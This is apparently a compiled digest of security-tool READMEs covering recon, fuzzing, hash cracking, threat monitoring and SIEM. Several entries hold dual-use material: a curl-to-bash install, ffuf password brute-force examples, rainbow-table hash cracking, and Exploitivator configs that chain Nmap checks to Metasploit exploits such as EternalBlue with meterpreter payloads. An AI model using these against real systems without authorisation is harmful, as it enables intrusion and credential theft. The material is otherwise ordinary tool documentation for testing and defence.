  • AutoMacTc - a forensics tool for Mac.
  • Bitlocker - volatility plugin
  • Autotimeliner - Automagically extract forensic timeline from volatile memory dumps.
  • Firmwalker - firmware analyzer.
  • CDQR - Cold Disk Quick Response tool
  • many other fixes and software updates.


ReconPi - Set Up Your Raspberry Pi To Perform Basic Recon Scans


ReconPi - A lightweight recon tool that performs extensive reconnaissance with the latest tools using a Raspberry Pi.
Start using that Raspberry Pi -- I know you all have one laying around somewhere ;)

Installation
Check the updated blogpost here for a complete guide on how to set up your own ReconPi: ReconPi Guide
If you prepared your Raspberry Pi through the guide linked above you should be able to continue below.
ReconPi v2.0 needs the HypriotOS (V1.10.0) image to work 100%!

Easy installation
Connect to your ReconPi with SSH:
ssh pirate@192.168.2.16 [Change IP to ReconPi IP]
Curl the install.sh script and run it:
curl -L https://raw.githubusercontent.com/x1mdev/ReconPi/master/install.sh | bash

Manual installation
Connect to your ReconPi with SSH:
$ ssh pirate@192.168.2.16 [Change IP to ReconPi IP]
Now we can set up everything, it's quite simple:
  • git clone https://github.com/x1mdev/ReconPi.git
  • cd ReconPi
  • ./install.sh
  • The script gives a reboot command at the end of install.sh; please log in again to start using the ReconPi.
Grab a cup of coffee since this will take a while.

Usage
After installing all of the dependencies for the ReconPi you can finally start doing some recon!
$ recon <domain.tld>
recon.sh will first gather resolvers for the given target, followed by subdomain enumeration and checking those assets for potential subdomain takeover. When this is done, the IP addresses of the target are enumerated. Open ports will be discovered, accompanied by a service scan provided by Nmap.
Finally the live targets will be screenshotted and evaluated to discover endpoints.
Results will be stored on the ReconPi and can be viewed by running python -m SimpleHTTPServer 1337 in your results directory. Your results will then be accessible from any system with a browser on the same network.

Tools
Tools that are being used at this moment:
More tools will be added in the future, feel free to make a pull request!

Contributors



Genact - A Nonsense Activity Generator


Pretend to be busy or waiting for your computer when you should actually be doing real work! Impress people with your insane multitasking skills. Just open a few instances of genact and watch the show. genact has multiple scenes that pretend to be doing something exciting or useful when in reality nothing is happening at all.



Installation
You don't have to install anything! For your convenience, prebuilt binaries for Linux, OSX and Windows are provided here that should run without any dependencies. Additionally, there is a web version at https://svenstaro.github.io/genact/
It's compatible with FreeBSD, Linux, OSX, Windows 10 (it needs a recent Windows 10 to get ANSI support) and most modern web browsers that support WebAssembly.
On FreeBSD: You don't have to do anything special here. Just run
pkg install genact
genact
On Linux: Download genact-linux from the releases page and run
chmod +x genact-linux
./genact-linux
On OSX: Download genact-osx from the releases page and run
chmod +x genact-osx
./genact-osx
On Windows: Download genact-win.exe from the releases page and double click it.
With Cargo: If you have a somewhat recent version of Rust and Cargo installed, you can run
cargo install genact
genact
With snap: If you'd like to use snapcraft, you can just get it from the snap store:
snap install genact
To build it yourself using snap, run:
snapcraft cleanbuild
snap install genact_*.snap --devmode --dangerous

Running
To see a list of all available options, you can run
./genact -h
or
cargo run -- -h
or (on Docker)
docker run -it --rm svenstaro/genact -h
The help:
genact 0.7.0
Sven-Hendrik Haase <svenstaro@gmail.com>
A nonsense activity generator

USAGE:
genact [FLAGS] [OPTIONS]

FLAGS:
    -h, --help            Prints help information
    -l, --list-modules    List available modules
    -V, --version         Prints version information

OPTIONS:
    -e, --exitafter <EXITAFTER>    Exit after running for this long (format example: 2h10min)
    -m, --modules <MODULE>...      Run only these modules [possible values: bootlog, botnet, cargo,
                                   cc, composer, cryptomining, simcity, download, docker,
                                   memdump, kernel_compile, weblog]
In the web version, you can run specific modules by providing them as ?module parameters like this: https://svenstaro.github.io/genact?module=cc&module=memdump
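On the command line, the flags above can be combined in the same way; for example, to run only the bootlog module for a fixed duration (module choice arbitrary, duration taken from the help's example format):

./genact -m bootlog -e 2h10min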

Compiling
You should have a recent version of Rust and Cargo installed. You don't need nightly. Then just clone the repository as usual and cargo run to get output:
git clone https://github.com/svenstaro/genact.git
cd genact
cargo run


Fileintel - A Modular Python Application To Pull Intelligence About Malicious Files


This is a tool used to collect various intelligence sources for a given file. Fileintel is written in a modular fashion so new intelligence sources can be easily added.
Files are identified by file hash (MD5, SHA1, SHA256). The output is in CSV format and sent to STDOUT so the data can be saved or piped into another program. Since the output is in CSV format, spreadsheets such as Excel or database systems will easily be able to import the data.
This works with Python v2, and it should also work with Python v3. If you find it does not work with Python v3, please post an issue.
This code has been tested on Windows 7 and Mac OSX El Capitan. If you try this on any other type of machine please let me know!
An introduction video for fileintel: https://youtu.be/MgJoy2fD0ZY
Background from my first tool hostintel: https://github.com/keithjjones/hostintel

Help Screen:
$ python fileintel.py -h
usage: fileintel.py [-h] [-a] [-v] [-n] [-o] [-t] [-r] ConfigurationFile InputFile

Modular application to look up file intelligence information. Outputs CSV to
STDOUT.

positional arguments:
  ConfigurationFile     Configuration file
  InputFile             Input file, one hash per line (MD5, SHA1, SHA256)

optional arguments:
  -h, --help            show this help message and exit
  -a, --all             Perform All Lookups.
  -v, --virustotal      VirusTotal Lookup.
  -n, --nsrl            NSRL Lookup for SHA-1 and MD5 hashes ONLY!
  -o, --otx             OTX by AlienVault Lookup.
  -t, --threatcrowd     ThreatCrowd Lookup for SHA-1 and MD5 hashes ONLY!
  -r, --carriagereturn  Use carriage returns with new lines on csv.

Install:
First, make sure your configuration file is correct for your computer/installation. Add your API keys and usernames as appropriate in the configuration file. Python and Pip are required to run this tool. There are modules that must be installed from GitHub, so be sure the git command is available from your command line. Git is easy to install for any platform. Next, install the python requirements (run this each time you git pull this repository too):
$ pip install -r requirements.txt
There have been some problems with the stock version of Python on Mac OSX (http://stackoverflow.com/questions/31649390/python-requests-ssl-handshake-failure). You may have to install the security portion of the requests library with the following command:
$ pip install requests[security]

NSRL
If you are using the NSRL database lookups, download the NSRL "Minimal" data set as a zip file. Put it in a directory you can access and point your configuration file to that zip file. There is no need to unzip the NSRL data.

7Zip
If you want to use 7Zip (fast) rather than the internal Python zip library (slow) to read the large NSRL zip file, you will need to install 7Zip. Windows installation of 7Zip is quite simple, but on Mac OS X or Linux you will need to install p7zip, the command-line tool. For Mac OS X, you can install this tool with Brew. Once you have installed 7Zip, point your configuration file to wherever the 7z executable lies.

Virtualenv
Lastly, I am a fan of virtualenv for Python. To make a customized local installation of Python to run this tool, I recommend you read:
http://docs.python-guide.org/en/latest/dev/virtualenvs/
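As a minimal sketch, a virtualenv-based setup for fileintel could look like this (directory name is arbitrary):

$ pip install virtualenv
$ virtualenv venv
$ source venv/bin/activate
(venv) $ pip install -r requirements.txt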

Running:
$ python fileintel.py myconfigfile.conf myhashes.txt -a > myoutput.csv
You should be able to import myoutput.csv into any database or spreadsheet program.
Note that depending on your network, your API key limits, and the data you are searching for, this script can run for a very long time! Use each module sparingly! In return for the long wait, you save yourself from having to pull this data manually.
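For example, to stay within one provider's API limits you could query only VirusTotal (using the -v flag from the help above) instead of all sources with -a:

$ python fileintel.py myconfigfile.conf myhashes.txt -v > vt_only.csv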

Sample Data:
There is some sample data in the "sampledata" directory. The hashes were picked at random and are by no means meant to target any organization or individual. Running this tool on the sample data works in the following way:

Smaller List:
$ python fileintel.py local/config.conf sampledata/smallerlist.txt -a > sampledata/smallerlist.csv
INFO: Using 7Zip from: /usr/local/bin/7z
Preprocessing NSRL database.... please hold...
*** Processing 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f ***
*** Processing 001025c6d4974fb2ccbea56f710282aca6c1353cc7120d5d4a7853688084953a ***
*** Processing 001025c6d4974fb2ccbea56f710282aca6c1353cc7120d5d4a7853688084953b ***
*** Processing 92945627f32dfde376ffb7091b5faad2 ***
*** Processing 92945627f32dfde376ffb7091b5faad1 ***
*** Processing CEEF161D68AE2B690FA9616361271578 ***
*** Processing D41D8CD98F00B204E9800998ECF8427E ***
*** Processing B284A42B124849E71DBEF653D30229F1 ***
*** Processing 0322A0BA58B95DB9A2227F12D193FDDEA74CFF89 ***
*** Processing E02CE6D73156A11BA84A798B26DE1D12 ***
*** Processing B4ED7AEDACD28CBBDE6978FB09C22C75 ***
*** Processing C6336EA255EFA7371337C0882D175BEE44CBBD49 ***

Larger List:
$ python fileintel.py local/config.conf sampledata/largerlist.txt -a > sampledata/largerlist.csv
INFO: Using 7Zip from: /usr/local/bin/7z
Preprocessing NSRL database.... please hold...
*** Processing 275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f ***
*** Processing 001025c6d4974fb2ccbea56f710282aca6c1353cc7120d5d4a7853688084953a ***
*** Processing CEEF161D68AE2B690FA9616361271578 ***
*** Processing D41D8CD98F00B204E9800998ECF8427E ***
*** Processing B284A42B124849E71DBEF653D30229F1 ***
*** Processing 0322A0BA58B95DB9A2227F12D193FDDEA74CFF89 ***
*** Processing E02CE6D73156A11BA84A798B26DE1D12 ***
*** Processing B4ED7AEDACD28CBBDE6978FB09C22C75 ***
*** Processing C6336EA255EFA7371337C0882D175BEE44CBBD49 ***
...
*** Processing 09a64957060121a765185392fe2ec742 ***
*** Processing e0ab52a76073bff4a27bdf327230103d ***
*** Processing 02a5bd561c140236a3380785a3544b71 ***
*** Processing 152c3bb23cc9cb0b0112051b94f69d47 ***
*** Processing 2c9a5e7ce87259ec89e182416ac3a4f8 ***
*** Processing c777b094a3469610d81c139c952e380e ***
*** Processing aa58d9126ed96fa61f53e4f6c0bcd6b4 ***
*** Processing a68e53c42e2d0968e2fbcd168323725f ***
*** Processing a1651db6630f90b11576389aa714ad41 ***

Intelligence Sources:

Resources:


Ffuf - Fast Web Fuzzer Written In Go

A fast web fuzzer written in Go.
Heavily inspired by the great projects gobuster and wfuzz.

Features
  • Fast!
  • Allows fuzzing of HTTP header values, POST data, and different parts of URL, including GET parameter names and values
  • Silent mode (-s) for clean output that's easy to use in pipes to other processes.
  • Modularized architecture that allows integration with existing toolchains with reasonable effort
  • Easy-to-add filters and matchers (they are interoperable)

Example cases

Typical directory discovery


By using the FUZZ keyword at the end of URL (-u):
ffuf -w /path/to/wordlist -u https://target/FUZZ

Virtual host discovery (without DNS records)


Assuming that the default virtualhost response size is 4242 bytes, we can filter out all responses of that size (-fs 4242) while fuzzing the Host header:
ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242

GET parameter fuzzing
GET parameter name fuzzing is very similar to directory discovery, and works by defining the FUZZ keyword as part of the URL. This example also assumes a response size of 4242 bytes for an invalid GET parameter name.
ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
If the parameter name is known, the values can be fuzzed the same way. This example assumes a wrong parameter value returning HTTP response code 401.
ffuf -w /path/to/values.txt -u https://target/script.php?valid_name=FUZZ -fc 401

POST data fuzzing
This is a very straightforward operation, again using the FUZZ keyword. This example fuzzes only part of the POST request. We're again filtering out the 401 responses.
ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401

Using external mutator to produce test cases
For this example, we'll fuzz JSON data that's sent over POST. Radamsa is used as the mutator.
When --input-cmd is used, ffuf will display matches as their position. This same position value will be available for the callee as an environment variable $FFUF_NUM. We'll use this position value as the seed for the mutator. Files example1.txt and example2.txt contain valid JSON payloads. We are matching all the responses, but filtering out response code 400 - Bad request:
ffuf --input-cmd 'radamsa --seed $FFUF_NUM example1.txt example2.txt' -H "Content-Type: application/json" -X POST -u https://ffuf.io.fi/ -mc all -fc 400
It of course isn't very efficient to call the mutator for each payload, so we can also pre-generate the payloads, still using Radamsa as an example:
# Generate 1000 example payloads
radamsa -n 1000 -o %n.txt example1.txt example2.txt

# This results in files 1.txt ... 1000.txt
# Now we can just read the payload data in a loop from file for ffuf

ffuf --input-cmd 'cat $FFUF_NUM.txt' -H "Content-Type: application/json" -X POST -u https://ffuf.io.fi/ -mc all -fc 400

Usage
To define the test case for ffuf, use the keyword FUZZ anywhere in the URL (-u), headers (-H), or POST data (-d).
Usage of ./ffuf:
-D DirSearch style wordlist compatibility mode. Used in conjunction with -e flag. Replaces %EXT% in wordlist entry with each of the extensions provided by -e.
-H "Name: Value"
Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-V Show version information.
-X string
HTTP method to use (default "GET")
-ac
Automatically calibrate filtering options
-acc value
Custom auto-calibration string. Can be used multiple times. Implies -ac
-b "NAME1=VALUE1; NAME2=VALUE2"
Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
Results unpredictable when combined with -H "Cookie: ..."
-c Colorize output.
-compressed
Dummy flag for copy as curl functionality (ignored) (default true)
-cookie value
Cookie data (alias of -b)
-d string
POST data
-data string
POST data (alias of -d)
-data-ascii string
POST data (alias of -d)
-data-binary string
POST data (alias of -d)
-debug-log string
Write all of the internal logging to the specified file.
-e string
Comma separated list of extensions to apply. Each extension provided will extend the wordlist entry once.
-fc string
Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl string
Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr string
Filter regexp
-fs string
Filter HTTP response size. Comma separated list of sizes and ranges
-fw string
Filter by amount of words in response. Comma separated list of word counts and ranges
-i Dummy flag for copy as curl functionality (ignored) (default true)
-input-cmd value
Command producing the input. --input-num is required when using this input method. Overrides -w.
-input-num int
Number of inputs to test. Used in conjunction with --input-cmd. (default 100)
-k TLS identity verification
-mc string
Match HTTP status codes from response, use "all" to match every response code. (default "200,204,301,302,307,401,403")
-ml string
Match amount of lines in response
-mode string
Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork (default "clusterbomb")
-mr string
Match regexp
-ms string
Match HTTP response size
-mw string
Match amount of words in response
-o string
Write output to file
-of string
Output file format. Available formats: json, ejson, html, md, csv, ecsv (default "json")
-p delay
Seconds of delay between requests, or a range of random delay. For example "0.1" or "0.1-2.0"
-r Follow redirects
-s Do not print additional information (silent mode)
-sa
Stop on all error cases. Implies -sf and -se
-se
Stop on spurious errors
-sf
Stop when > 95% of responses return 403 Forbidden
-t int
Number of concurrent threads. (default 40)
-timeout int
HTTP request timeout in seconds. (default 10)
-u string
Target URL
-v Verbose output, printing full URL and redirect location (if any) with the results.
-w value
Wordlist file path and (optional) custom fuzz keyword, using colon as delimiter. Use file path '-' to read from standard input. Can be supplied multiple times. Format: '/path/to/wordlist:KEYWORD'
-x string
HTTP Proxy URL
e.g. ffuf -u https://example.org/FUZZ -w /path/to/wordlist
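Combining the -w keyword syntax with -mode (both described above), a pitchfork-style credential check might look like this sketch (wordlists and endpoint are placeholders):

ffuf -w usernames.txt:USER -w passwords.txt:PASS -mode pitchfork -X POST -d "username=USER&password=PASS" -u https://target/login.php -fc 401

In pitchfork mode the wordlists are iterated in lockstep (entry N of usernames.txt with entry N of passwords.txt), whereas clusterbomb tries every combination.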

Installation
  • Download a prebuilt binary from releases page, unpack and run! or
  • If you have go compiler installed: go get github.com/ffuf/ffuf
The only dependency of ffuf is Go 1.11. No dependencies outside of the Go standard library are needed.

Changelog
  • master
    • New
    • Changed
      • Limit the use of -e (extensions) to a single keyword: FUZZ
  • v0.12
    • New
      • Added a new flag to select a multi wordlist operation mode: --mode, possible values: clusterbomb and pitchfork.
      • Added a new output file format eJSON, for always base64 encoding the input data.
      • Redirect location is always shown in the output files (when using -o)
      • Full URL is always shown in the output files (when using -o)
      • HTML output format got DataTables support allowing realtime searches, sorting by column etc.
      • New CLI flag -v for verbose output. Including full URL, and redirect location.
      • SIGTERM monitoring, in order to catch keyboard interrupts and such, to be able to write -o files before exiting.
    • Changed
      • Fixed a bug in the default multi wordlist mode
      • Fixed JSON output regression, where all the input data was always encoded in base64
      • --debug-log now correctly logs connection errors
      • Removed -l flag in favor of -v
      • More verbose information in the banner shown at startup.
  • v0.11
    • New
      • New CLI flag: -l, shows target location of redirect responses
      • New CLI flag: -acc, custom auto-calibration strings
      • New CLI flag: -debug-log, writes the debug logging to the specified file.
      • New CLI flags -ml and -fl, filters/matches line count in response
      • Ability to use multiple wordlists / keywords by defining multiple -w command line flags. If no keyword is defined, the default is FUZZ to keep backwards compatibility. Example: -w "wordlists/custom.txt:CUSTOM" -H "RandomHeader: CUSTOM".
    • Changed
      • New CLI flag: -i, a dummy flag that does nothing, for compatibility with copy as curl.
      • New CLI flag: -b/--cookie, cookie data for compatibility with copy as curl.
      • New output formats are available: HTML and Markdown table.
      • New CLI flag: -l, shows target location of redirect responses
      • Filtering and matching by status code, response size or word count now allow using ranges in addition to single values
      • Internal logging information is discarded by default, and can be written to a file with the new -debug-log flag.
  • v0.10
    • New
      • New CLI flag: -ac to autocalibrate response size and word filters based on a few preset URLs.
      • New CLI flag: -timeout to specify custom timeouts for all HTTP requests.
      • New CLI flag: --data for compatibility with copy as curl functionality of browsers.
      • New CLI flag: --compressed, a dummy flag that does nothing, for compatibility with copy as curl.
      • New CLI flags: --input-cmd, and --input-num to handle input generation using external commands. Mutators for example. Environment variable FFUF_NUM will be updated on every call of the command.
      • When --input-cmd is used, display position instead of the payload in results. The output file (of all formats) will include the payload in addition to the position however.
    • Changed
      • Wordlist can also be read from standard input
      • Defining -d or --data implies the POST method if -X doesn't set it to something other than GET
  • v0.9
    • New
      • New output file formats: CSV and eCSV (CSV with base64 encoded input field to avoid CSV breakage with payloads containing a comma)
      • New CLI flag to follow redirects
      • Erroring connections will be retried once
      • Error counter in status bar
      • New CLI flags: -se (stop on spurious errors) and -sa (stop on all errors, implies -se and -sf)
      • New CLI flags: -e to provide a list of extensions to add to wordlist entries, and -D to provide DirSearch wordlist format compatibility.
      • Wildcard option for response status code matcher.
  • v0.8
    • New
      • New CLI flag to write output to a file in JSON format
      • New CLI flag to stop on spurious 403 responses
    • Changed
      • Regex matching / filtering now matches the headers alongside of the response body


    Splunk Attack Range - A Tool That Allows You To Create Vulnerable Instrumented Local Or Cloud Environments To Simulate Attacks Against And Collect The Data Into Splunk


    The Attack Range solves two main challenges in the development of detections. First, it allows the user to quickly build a small lab infrastructure as close as possible to a production environment. This lab infrastructure contains a Windows Domain Controller, a Windows workstation and a Linux server, which come pre-configured with multiple security tools and logging configuration. The infrastructure comes with a Splunk server collecting multiple log sources from the different servers.
    Second, this framework allows the user to perform attack simulation using different engines. Therefore, the user can repeatedly replicate and generate data as close to "ground truth" as possible, in a format that allows the creation of detections, investigations, knowledge objects, and playbooks in Splunk.

    Architecture
    Attack Range can be used in two different ways:
    • local using vagrant and virtualbox
    • in the cloud using terraform and AWS
    In order to make Attack Range work on almost every laptop, the local version using Vagrant and Virtualbox consists of a subset of the full-blown cloud infrastructure in AWS using Terraform. The local version consists of a Splunk single instance and a Windows 10 workstation pre-configured with best practice logging configuration according to Splunk. The cloud infrastructure in AWS using Terraform consists of a Windows 10 workstation, a Windows 2016 server and a Splunk server. More information can be found in the wiki


    Configuration

    Running
    Attack Range supports different actions:
    • Build Attack Range
    • Perform Attack Simulation
    • Destroy Attack Range
    • Stop Attack Range
    • Resume Attack Range

    Build Attack Range
    • Build Attack Range using Terraform
    python attack_range.py -m terraform -a build
    • Build Attack Range using Vagrant
    python attack_range.py -m vagrant -a build

    Perform Attack Simulation
    • Perform Attack Simulation using Terraform
    python attack_range.py -m terraform -a simulate -st T1117,T1003 -t attack-range_windows_2016_dc
    • Perform Attack Simulation using Vagrant
    python attack_range.py -m vagrant -a simulate -st T1117,T1003 -t win10

    Destroy Attack Range
    • Destroy Attack Range using Terraform
    python attack_range.py -m terraform -a destroy
    • Destroy Attack Range using Vagrant
    python attack_range.py -m vagrant -a destroy

    Stop Attack Range
    • Stop Attack Range using Terraform
    python attack_range.py -m terraform -a stop
    • Stop Attack Range using Vagrant
    python attack_range.py -m vagrant -a stop

    Resume Attack Range
    • Resume Attack Range using Terraform
    python attack_range.py -m terraform -a resume
    • Resume Attack Range using Vagrant
    python attack_range.py -m vagrant -a resume

    Support
    Please use the GitHub issue tracker to submit bugs or request features.
    If you have questions or need support, you can:

    Author

    Contributors

    Acknowledgements


    HashCobra - Hash Cracking Tool


    hashcobra is a hash cracking tool.

    Usage
    $ ./hashcobra -H
    --==[ hashcobra by sepehrdad ]==--

    usage:

    hashcobra -o <opr> [options] | [misc]

    options:

    -a <alg> - hashing algorithm [default: md5]
    - ? to list available algorithms
    -c <alg> - compression algorithm [default: zstd]
    - ? to list available algorithms
    -h <hash> - hash to crack
    -r <path> - rainbow table path [default: hashcobra.db]
    -d <path> - dictionary file path
    -o <opr> - operation to do
    - ? to list available operations
    misc:

    -V - show version
    -H - show help

    example:

    # Create md5 rainbow table with zstd compression from rockyou.txt
    $ hashcobra -o create -d rockyou.txt

    # Create sha512 rainbow table with no compression from darkc0de.lst
    $ hashcobra -o create -a sha512 -c none -r rt.db -d darkc0de.lst

    # Crack 1a1dc91c907325c69271ddf0c944bc72 using rt.db
    $ hashcobra -h 1a1dc91c907325c69271ddf0c944bc72 -r rt.db

    Description
    This tool uses rainbow tables to crack hashes, which makes it
    really fast and much faster than traditional hash crackers.

    Build Prerequisites
    • Make is required.
    • GCC 8.0 or above is required.
    • The most recent version of Rocksdb is required.
    • The most recent version of Openssl is required.

    Building
    $ make

    LEGAL NOTICE
    THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.


    RTTM - Real Time Threat Monitoring Tool


    Monitoring your company's possible threats on the Internet is an impossible task to achieve manually, so many threats go unnoticed until they become viral in public, causing monetary and reputation damage. This is where RTTM comes into action. RTTM (Real Time Threat Monitoring Tool) is a tool developed to scrape all pasties, GitHub, Reddit, etc. in real time to identify occurrences of the configured search terms. Upon a match, an email is triggered, allowing the company to react to leaked code, tweeted hacks, etc., and harden itself against an attack before it goes viral.
    Over the past 2 years the tool has evolved beyond simple search. Artificial intelligence has been implemented to perform better, context-based searches, and regex is supported where needed. The tool's behaviour is thus close to a human's and reduces false positives.
    The best part of the tool is that an alert is sent to email in less than 60 seconds from the time a threat has made it to the internet, allowing a response to happen in real time.
    The same tool in a malicious user's hands could be used offensively to get updates on the latest hacks, code leakage, etc.

    List of sites which will be monitored are:
    • Non-Pastie Sites
      • Twitter
      • Reddit
      • Github
    • Pastie Sites
      • Pastebin.com
      • Codepad.org
      • Dumpz.org
      • Snipplr.com
      • Paste.org.ru
      • Gist.github.com
      • Pastebin.ca
      • Kpaste.net
      • Slexy.org
      • Ideone.com
      • Pastebin.fr

    Architecture:


    How it works?
    Once the tool is started, the engine kicks off and runs forever. The main input for this engine is the configuration file. Based on the configuration file data, the engine probes Twitter/GitHub/Reddit for the matches configured in the configuration file. When a match is found, the Twitter/GitHub/Reddit link is pushed to a SQLite DB and an email alert is triggered.
    For pastie sites the logic is different, the reason being that they support neither search nor streaming APIs. Hence, whenever any user creates a new pastie, its link is fetched and pushed to Kafka. Any new link added to Kafka is then picked up and searched for the matches configured in the configuration file. When a match is found, the pastie site link is pushed to a SQLite DB and an email alert is triggered.

    Detailed Tool Documentation:
    https://real-time-threat-monitoring.readthedocs.io/en/latest/

    Developers:
    Authors:
    • Naveen Rudrappa
    Contributors:
    • Sunny Sharma
    • Murali Segu


    Exploitivator - Automate Metasploit Scanning And Exploitation


    This has only been tested on Kali.
    It depends on the msfrpc module for Python, described in detail here: https://www.trustwave.com/Resources/SpiderLabs-Blog/Scripting-Metasploit-using-MSGRPC/
    Install the necessary Kali packages and the PostgreSQL gem for Ruby:
    apt-get install postgresql libpq-dev git-core
    gem install pg
    Install the current version of the msfrpc Python module from git:
    git clone git://github.com/SpiderLabs/msfrpc.git msfrpc
    cd msfrpc/python-msfrpc
    python setup.py install

    Usage
    Before running either of the scripts, load msfconsole and start the MSGRPC service.
    MSGRPC can be started from within msfconsole as follows: load msgrpc Pass=abc123 (see the session sketch below).
    The results of scans and/or exploitation will appear in the Metasploit console and in the output file(s) (msf_scan_output.txt and exploitivator_output.txt).
    Use MSFScan to run multiple Metasploit scans against a group of target hosts. Use Exploitivator to run Nmap script scans against a group of target hosts and automatically exploit any reported as vulnerable.
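    As a sketch, starting MSGRPC from a Metasploit console session looks like this (the password is whatever you choose; it must match what you pass to the scripts):
    $ msfconsole
    msf > load msgrpc Pass=abc123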

    Exploitivator
    Command line usage:
    Examples: The application can be run as follows, where '10.128.108.178' is the IP address of the attack machine, 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:
    ./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123

    MSFScan
    Command line usage:
    ./msf_scan.py filename
    ./msf_scan.py filename MSF_DB_Username MSF_DB_Password
    Examples: The application can be run as follows, where 'hosts.txt' is a list of target hosts, 'msf' is the Metasploit Postgres username and 'abc123' is the Metasploit Postgres password:
    ./msf_scan.py hosts.txt msf abc123
    To run with 'hosts.txt' as a list of target hosts, using the script's default Metasploit Postgres username (msf) and default password (abc123):
    ./msf_scan.py hosts.txt

    Config Files
    Both scripts rely on config files to provide details of the required Nmap and Metasploit scans and attacks.

    MSFScan
    The script uses a config file with the name 'scan_types.cfg'. This contains a list of paths for any Metasploit scans that are to run against the targets, e.g.:
    auxiliary/scanner/dcerpc/endpoint_mapper
    auxiliary/scanner/smb/smb_version
    auxiliary/scanner/x11/open_x11
    auxiliary/scanner/discovery/ipv6_multicast_ping
    auxiliary/scanner/discovery/ipv6_neighbor
    auxiliary/scanner/smb/smb_login

    Exploitivator
    This script uses two config files (exploitivator_scan.cfg and exploitivator.cfg): one to specify Nmap scans and parameters (exploitivator_scan.cfg), and one to specify Metasploit payloads and parameters (exploitivator.cfg). These use '##' as a separator and have the following formats.
    exploitivator_scan.cfg: [Label]##[Nmap command line parameters]##[Nmap command line parameters for file output]##[Optional - grep command to be used if Nmap's greppable output is being used]
    In the above format:
    1. The first section is a label linking the scan to the exploit
    2. The second section is the part of the Nmap command line which specifies the details of the type of scan to run, such as port and script
    3. The third section is the part of the Nmap command line that defines the Nmap output file (Exploitivator handles XML or greppable Nmap output)
    4. The optional fourth section is the grep command that you wish to use in order to identify a vulnerable target within a '.gnmap' file
    An example file content is shown below:
    SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
    SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
    SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
    SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
    SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
    DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632/open/tcp//distccd"
    JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099/open/tcp//rmi"
    VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"
    exploitivator.cfg: [Label]##[Metasploit exploit path]##[Optional - Metasploit payload details]
    An example file content is shown below:
    SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
    SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
    SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
    SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
    DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
    JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
    VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none

    References
    Starting and connecting to MSGRPC: https://www.packtpub.com/mapt/book/networking_and_servers/9781785280696/9/ch09lvl1sec60/metasploit-scripting-with-msgrpc
    Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/



    Dsiem - Security Event Correlation Engine For ELK Stack


    Dsiem is a security event correlation engine for ELK stack, allowing the platform to be used as a dedicated and full-featured SIEM system.
    Dsiem provides OSSIM-style correlation for normalized logs/events, performs lookups/queries against threat intelligence and vulnerability information sources, and produces risk-adjusted alarms.

    Features
    • Runs in standalone or clustered mode with NATS as the messaging bus between frontend and backend nodes. Along with ELK, this makes the entire SIEM platform horizontally scalable.
    • OSSIM-style correlation and directive rules, bridging easier transition from OSSIM.
    • Alarms enrichment with data from threat intel and vulnerability information sources. Builtin support for Moloch Wise (which supports Alienvault OTX and others) and Nessus CSV exports. Support for other sources can easily be implemented as plugins.
    • Instrumentation supported through Metricbeat and/or Elastic APM server. No extra stack is needed for this purpose.
    • Builtin rate and back-pressure control, set the minimum and maximum events/second (EPS) received from Logstash depending on your hardware capacity and acceptable delays in event processing.
    • Loosely coupled, designed to be composable with other infrastructure platforms, and doesn't try to do everything. Loose coupling also means that it's possible to use Dsiem as an OSSIM-style correlation engine with a non-ELK stack if needed.
    • Batteries included:
      • A directive conversion tool that reads OSSIM XML directive file and translate it to Dsiem JSON-style config.
      • A SIEM plugin creator tool that will read off an existing index pattern from Elasticsearch, and creates the necessary Logstash configuration to clone the relevant fields' content to Dsiem. The tool can also generate basic directive required by Dsiem to correlate received events and generate alarm.
      • A helper tool to serve Nessus CSV files over the network to Dsiem.
      • A lightweight Angular web UI just for basic alarm management (closing, tagging), and easy pivoting to the relevant indices in Kibana to perform the actual analysis.
    • Obviously a cloud-native, twelve-factor app, and all that jazz.

    How It Works


    On the diagram above:
    1. Log sources send their logs to Syslog/Filebeat, which then sends them to Logstash with a unique identifying field. Logstash then parses the logs using different filters based on the log sources type, and sends the results to Elasticsearch, typically creating a single index pattern for each log type (e.g. suricata-* for logs received from Suricata IDS, ssh-* for SSH logs, etc.).
